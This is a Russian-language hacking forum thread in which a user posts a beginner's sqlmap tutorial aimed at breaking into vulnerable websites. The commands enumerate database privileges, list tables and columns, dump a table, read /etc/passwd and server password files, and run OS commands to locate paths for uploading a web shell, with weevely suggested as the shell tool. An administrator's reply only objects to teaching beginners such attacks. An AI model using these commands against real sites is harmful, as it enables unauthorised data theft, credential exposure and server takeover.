sqlmap для новичков

CyberWarning

rm -rf /dev/null/
Забаненный
Сообщения
38
Симпатии
46
Баллы
18
#1
Всем приветик ,начнем с того, что многие новички задаются вопросом как юзать sqlmap

Начнем с самого простого ,например у нас есть уязвимый сайт ,который хотим поломать !

Итак запускаем sqlmap -u

Пожалуйста, Войдите или Зарегистрируйтесь, что бы увидеть скрытый контент.

-o -b --current-user --is-dba

1.png

Следовательно
current user: '[email protected]'
current user is DBA: True если False , то шансов порутать серв мало

Далее разворачиваем список таблиц в базе

sqlmap -u

Пожалуйста, Войдите или Зарегистрируйтесь, что бы увидеть скрытый контент.

--columns --tables

И перед Вами список таблиц ,например нам нужна таблица
ap_element_options

2.png

Выполняем слудующий запрос

sqlmap -u

Пожалуйста, Войдите или Зарегистрируйтесь, что бы увидеть скрытый контент.

-D machform -T ap_element_options --columns

Перед Вами список из 8 колонок ,например мы хотим их полностью сохранить

Выполняем следующий запрос

sqlmap -u

Пожалуйста, Войдите или Зарегистрируйтесь, что бы увидеть скрытый контент.

-D machform -T ap_element_options -С option,position,aeo_id,element_id,form_id,live,option_id,option_is_default --dump-all --save

3.png

Читаем содержимое файлов на сервере !

sqlmap -u

Пожалуйста, Войдите или Зарегистрируйтесь, что бы увидеть скрытый контент.

--file-read="/etc/passwd" --file-read="httpd/pass/httpd/passwd.conf" но могут быть и в других подразделах )

4.png

Выполним еще запросик небольшой )) Раскрывем пути ,куда в дальнейшем будем лить облочку вебшелла )

sqlmap -u

Пожалуйста, Войдите или Зарегистрируйтесь, что бы увидеть скрытый контент.

--os-cmd=ls

Дальше думаю Вам все понятно ! В крайнем соучае используем weevely для оболочки !

Удачи
 
Последнее редактирование модератором:

Skaiman

[SVG]ADD-ONS ™
Администратор
Сообщения
5.376
Симпатии
5.903
Баллы
226
#2
Всем приветик ,начнем с того, что многие новички задаются вопросом как юзать sqlmap
Так лучше и пусть остаются на том же уровне. Зачем это, блин, что бы школота твой же сайт ломала?